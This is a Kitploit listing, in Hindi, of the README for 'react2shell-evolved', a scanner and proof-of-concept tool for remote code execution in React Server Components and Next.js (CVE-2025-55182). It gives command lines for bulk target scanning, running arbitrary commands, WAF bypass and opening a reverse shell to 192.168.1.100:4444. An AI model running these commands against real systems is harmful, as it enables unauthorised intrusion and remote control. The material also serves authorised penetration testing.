Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-evolved — एसेटनोट CVE-2025-55182 स्कैनर का एक उन्नत संस्करण | Kitploit
उपकरण/GitHubGitHub/guiimoraes/react2shell-evolved
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubguiimoraes/react2shell-evolved

react2shell-evolved

एसेटनोट CVE-2025-55182 स्कैनर का एक उन्नत संस्करण

रिपॉजिटरी देखें
217 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell Scanner

RSC/Next.js RCE के लिए उच्च-विश्वसनीयता डिटेक्शन

React Server Components और Next.js अनुप्रयोगों में Remote Code Execution (RCE) कमजोरियों का पता लगाने के लिए स्कैनर।

परिचय

React2Shell Scanner एक विशेष उपकरण है जो React Server Components (RSC) और Next.js का उपयोग करने वाले अनुप्रयोगों में दूरस्थ कोड निष्पादन (RCE) कमजोरियों की पहचान करने के लिए है। यह उपकरण निम्नलिखित CVEs से संबंधित कमजोरियों का पता लगाता है:

  • CVE-2025-55182
  • CVE-2025-66478

यह उपकरण साइड-चैनल डिटेक्शन और RCE प्रूफ-ऑफ-कॉन्सेप्ट का उपयोग करके उच्च-विश्वसनीयता जाँच करता है, जिसमें HTTP प्रतिक्रियाओं के स्वचालित पार्सिंग के माध्यम से निष्पादित कमांडों के गतिशील परिणाम निकालने की क्षमता होती है।

यह Assetnote Security Research Team द्वारा विकसित मूल स्कैनर का @imguimoraes द्वारा संपादित संस्करण है। मूल RCE PoC @maple3142 द्वारा बनाया गया था।

विशेषताएँ

  • साइड-चैनल और PoC RCE का उपयोग करके उच्च-विश्वसनीयता डिटेक्शन
  • बल्क स्कैन के लिए मल्टी-थ्रेडेड निष्पादन
  • निष्पादित कमांडों के परिणामों की गतिशील निकासी (हेडर और प्रतिक्रिया बॉडी का स्वचालित पार्सिंग)
  • कॉन्फ़िगर करने योग्य यादृच्छिक डेटा के साथ WAF बायपास
  • Windows (PowerShell) और Linux/Unix (shell) के लिए समर्थन
  • बाद के विश्लेषण के लिए संरचित JSON आउटपुट
  • रिडायरेक्ट का स्वचालित अनुसरण
  • प्रोग्रेस बार और रंगीन आउटपुट के साथ इंटरफ़ेस

स्थापना

आवश्यकताएँ

  • Python 3.8 या उच्चतर
  • pip (Python पैकेज प्रबंधक)

निर्भरताओं की स्थापना

root@kitploit:~
pip install requests tqdm

या requirements.txt फ़ाइल का उपयोग करके:

root@kitploit:~
pip install -r requirements.txt

उपयोग

मूल सिंटैक्स

root@kitploit:~
python scanner.py [-u URL | -l FILE] [opções]

एकल URL जाँचें

root@kitploit:~
python scanner.py -u https://example.com

एकाधिक URLs जाँचें

root@kitploit:~
python scanner.py -l hosts.txt

कमांड लाइन विकल्प

इनपुट विकल्प (उनमें से एक अनिवार्य)

विकल्पविवरण
-u, --url URLजाँचने के लिए एकल URL या होस्ट
-l, --list FILEहोस्टों की सूची वाली फ़ाइल (प्रति पंक्ति एक)

निष्पादन विकल्प

विकल्पविवरण
-t, --threads Nसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
--timeout SECONDSसेकंड में अनुरोधों का टाइमआउट (डिफ़ॉल्ट: 10)
-k, --insecureSSL प्रमाणपत्र सत्यापन अक्षम करें (डिफ़ॉल्ट रूप से सक्षम)

आउटपुट विकल्प

हेडर विकल्प

विकल्पविवरण
-H, --header "Key: Value"कस्टम HTTP हेडर जोड़ें (कई बार उपयोग किया जा सकता है)

एक्सप्लॉइट विकल्प

उपयोग के उदाहरण

उदाहरण 1: एक होस्ट का बुनियादी स्कैन

root@kitploit:~
python scanner.py -u https://target.com

उदाहरण 2: एकाधिक थ्रेड्स के साथ बल्क स्कैन

root@kitploit:~
python scanner.py -l targets.txt -t 50 --timeout 15

उदाहरण 3: JSON आउटपुट के साथ स्कैन

root@kitploit:~
python scanner.py -l targets.txt -o results.json --all-results

उदाहरण 4: कस्टम हेडर के साथ स्कैन

root@kitploit:~
python scanner.py -u https://target.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

उदाहरण 5: कस्टम पेलोड के साथ स्कैन

root@kitploit:~
python scanner.py -u https://target.com --payload "whoami"

उदाहरण 6: WAF बायपास के साथ स्कैन

root@kitploit:~
python scanner.py -l targets.txt --waf-bypass --waf-bypass-size 256

उदाहरण 7: Windows वातावरण में स्कैन

root@kitploit:~
python scanner.py -u https://target.com --windows --payload "whoami"

उदाहरण 8: सुरक्षित जांच के साथ स्कैन (गैर-आक्रामक)

root@kitploit:~
python scanner.py -l targets.txt --safe-check

उदाहरण 9: पूर्ण विस्तृत स्कैन

root@kitploit:~
python scanner.py -l targets.txt -v --all-results -o full_scan.json

उदाहरण 10: रिवर्स शेल स्थापित करना

root@kitploit:~
python scanner.py -u https://target.com --reverse-shell 192.168.1.100:4444

आउटपुट प्रारूप

टर्मिनल आउटपुट

स्कैनर स्थिति दर्शाने वाले रंग कोड के साथ परिणाम प्रदर्शित करता है:

  • [VULNERABLE] - कमजोर होस्ट (लाल)
  • [NOT VULNERABLE] - गैर-कमजोर होस्ट (हरा)
  • [ERROR] - जांच के दौरान त्रुटि (पीला)

कमजोर होस्टों के लिए, X-Action-Redirect हेडर या प्रतिक्रिया बॉडी से स्वचालित निकासी के माध्यम से उपलब्ध होने पर निष्पादित कमांड का परिणाम प्रदर्शित किया जाता है।

JSON प्रारूप

जब -o विकल्प का उपयोग किया जाता है, तो आउटपुट निम्नलिखित संरचना के साथ JSON प्रारूप में सहेजा जाता है:

root@kitploit:~
{
  "scan_time": "2025-01-XXT00:00:00.000000Z",
  "total_results": 10,
  "results": [
    {
      "host": "https://target.com",
      "vulnerable": true,
      "status_code": 307,
      "final_url": "https://target.com/",
      "command_result": "11111",
      "timestamp": "2025-01-XXT00:00:00.000000Z",
      "request": "POST / HTTP/1.1\r\n...",
      "response": "HTTP/1.1 307 Temporary Redirect\r\n...",
      "error": null
    }
  ]
}

परिणाम के फ़ील्ड:

  • vulnerable: true यदि कमजोर है, false यदि कमजोर नहीं है, null यदि त्रुटि हुई
  • command_result: प्रतिक्रिया से निकाला गया निष्पादित कमांड का परिणाम (जब उपलब्ध हो)
  • final_url: परीक्षण किया गया अंतिम URL (रिडायरेक्ट का अनुसरण सक्षम होने पर)
  • status_code: प्रतिक्रिया का HTTP कोड
  • request: भेजा गया पूर्ण HTTP अनुरोध
  • response: प्राप्त HTTP प्रतिक्रिया (पहले 2000 वर्ण)
  • error: त्रुटि संदेश यदि कोई हो
  • timestamp: जांच का UTC टाइमस्टैम्प

तकनीकी विशेषताएँ

डिटेक्शन विधियाँ

स्कैनर दो डिटेक्शन विधियाँ प्रदान करता है:

  1. Safe Check (--safe-check): गैर-आक्रामक साइड-चैनल डिटेक्शन जो कोड निष्पादित किए बिना प्रतिक्रिया में त्रुटि पैटर्न की जाँच करता है। बिना प्रभाव के प्रारंभिक स्कैन के लिए उपयोगी।

  2. RCE PoC: परिणामों की गतिशील निकासी के साथ वास्तविक दूरस्थ कोड निष्पादन। सिस्टम कमांड निष्पादित करने के लिए Node.js child_process-आधारित पेलोड का उपयोग करता है।

परिणामों की निकासी

स्कैनर निष्पादित कमांडों के परिणाम निकालने के लिए HTTP प्रतिक्रियाओं का स्वचालित पार्सिंग करता है:

  • X-Action-Redirect हेडर की निकासी (प्रारूप: NEXT_REDIRECT;push;/login?a=<result>;307;)
  • प्रतिक्रिया बॉडी की निकासी (प्रारूप: E{"digest":"<result>"} या 1:E{"digest":"<result>"})
  • --payload पैरामीटर के माध्यम से किसी भी कस्टम कमांड/पेलोड के साथ काम करता है

निकासी गतिशील रूप से की जाती है, निश्चित मानों पर निर्भर नहीं होती, जिससे किसी भी कमांड के निष्पादन को मान्य करना संभव होता है।

WAF Bypass

जब --waf-bypass विकल्प का उपयोग किया जाता है:

  • multipart/form-data पेलोड की शुरुआत में यादृच्छिक डेटा (जंक डेटा) जोड़ता है
  • --waf-bypass-size के माध्यम से कॉन्फ़िगर करने योग्य आकार (डिफ़ॉल्ट: 128KB)
  • अनुरोध बॉडी की सामग्री का निरीक्षण करने वाले WAF फ़िल्टर को बायपास करने के लिए उपयोगी
  • WAF बायपास सक्रिय होने पर टाइमआउट स्वचालित रूप से 20 सेकंड तक बढ़ा दिया जाता है

कस्टम पेलोड

--payload पैरामीटर निष्पादित किए जाने वाले किसी भी कमांड को निर्दिष्ट करने की अनुमति देता है:

  • डिफ़ॉल्ट: echo $((41*271)) (परिणाम: 11111)
  • Windows: जब --windows सक्रिय हो तो PowerShell कमांड का उपयोग करें
  • Linux/Unix: मानक shell कमांड का उपयोग करें

कमांड का परिणाम स्वचालित रूप से निकाला और प्रदर्शित किया जाता है, चाहे लौटाया गया मान कुछ भी हो।

Reverse Shell

--reverse-shell विकल्प reverse shell कनेक्शन स्थापित करने की अनुमति देता है:

  • प्रारूप: IP:PORT (उदाहरण: 192.168.1.100:4444)
  • Node.js net और child_process मॉड्यूल का उपयोग करता है
  • Windows के लिए: powershell.exe स्पॉन करता है
  • Linux/Unix के लिए: /bin/sh स्पॉन करता है

कानूनी और नैतिक चेतावनियाँ

यह उपकरण विशेष रूप से शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षणों के लिए है।

  • केवल उन्हीं सिस्टम पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट और लिखित अनुमति है
  • इस उपकरण का अनधिकृत उपयोग अवैध है और आपराधिक दायित्व का कारण बन सकता है
  • डेवलपर्स इस उपकरण के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं
  • पेनेट्रेशन परीक्षण करने से पहले हमेशा लिखित अनुमति प्राप्त करें
  • अपने क्षेत्राधिकार में लागू कानूनों और विनियमों का सम्मान करें

क्रेडिट

मूल एक्सप्लॉइट

मूल RCE एक्सप्लॉइट @maple3142 द्वारा बनाया गया था।

मूल स्कैनर

मूल स्कैनर Assetnote Security Research Team द्वारा विकसित किया गया था:

  • रिपॉजिटरी: https://github.com/assetnote/react2shell-scanner/
  • वेबसाइट: https://www.assetnote.io/

यह संस्करण

यह संपादित संस्करण अतिरिक्त सुधारों के साथ मूल स्कैनर की कार्यक्षमताओं को बनाए रखता है:

  • कमांड परिणामों की गतिशील निकासी (प्रतिक्रियाओं का स्वचालित पार्सिंग)
  • परिणाम निकासी के साथ कस्टम कमांड के लिए समर्थन
  • Vercel Bypass को हटाया गया (??/??/2025 में पैच किया गया)
  • Reverse Shell प्रणाली (क्रैश-फ्रेंडली)

द्वारा संपादित: guiimoraes

संबंधित CVEs

  • CVE-2025-55182
  • CVE-2025-66478

यदि आपको बग मिलें या सुधार के सुझाव हों, तो कृपया रिपॉजिटरी में एक issue खोलें और समस्या का विस्तृत विवरण दें।

टूल डाउनलोड करें
विकल्पविवरण
-o, --output FILEJSON प्रारूप में परिणामों के लिए आउटपुट फ़ाइल
--all-resultsसभी परिणाम फ़ाइल में सहेजें, केवल कमजोर वाले नहीं
-v, --verboseविस्तृत आउटपुट (विश्लेषण के लिए प्रतिक्रिया स्निपेट दिखाता है)
-q, --quietशांत मोड (केवल कमजोर होस्ट दिखाता है)
--no-colorरंगीन आउटपुट अक्षम करें
विकल्पविवरण
--safe-checkPoC RCE के बजाय सुरक्षित साइड-चैनल डिटेक्शन का उपयोग करें (कोड निष्पादित नहीं करता)
--windowsUnix shell के बजाय PowerShell पेलोड का उपयोग करें (Windows वातावरण के लिए)
--waf-bypassWAF बायपास के लिए पेलोड में यादृच्छिक डेटा जोड़ें (डिफ़ॉल्ट: 128KB)
--waf-bypass-size KBWAF बायपास के लिए यादृच्छिक डेटा का आकार KB में (डिफ़ॉल्ट: 128)
--payload COMMANDRCE में निष्पादित करने के लिए कस्टम कमांड (डिफ़ॉल्ट: echo $((41*271)))
--reverse-shell IP:PORTनिर्दिष्ट IP:PORT के लिए reverse shell कनेक्शन बनाएं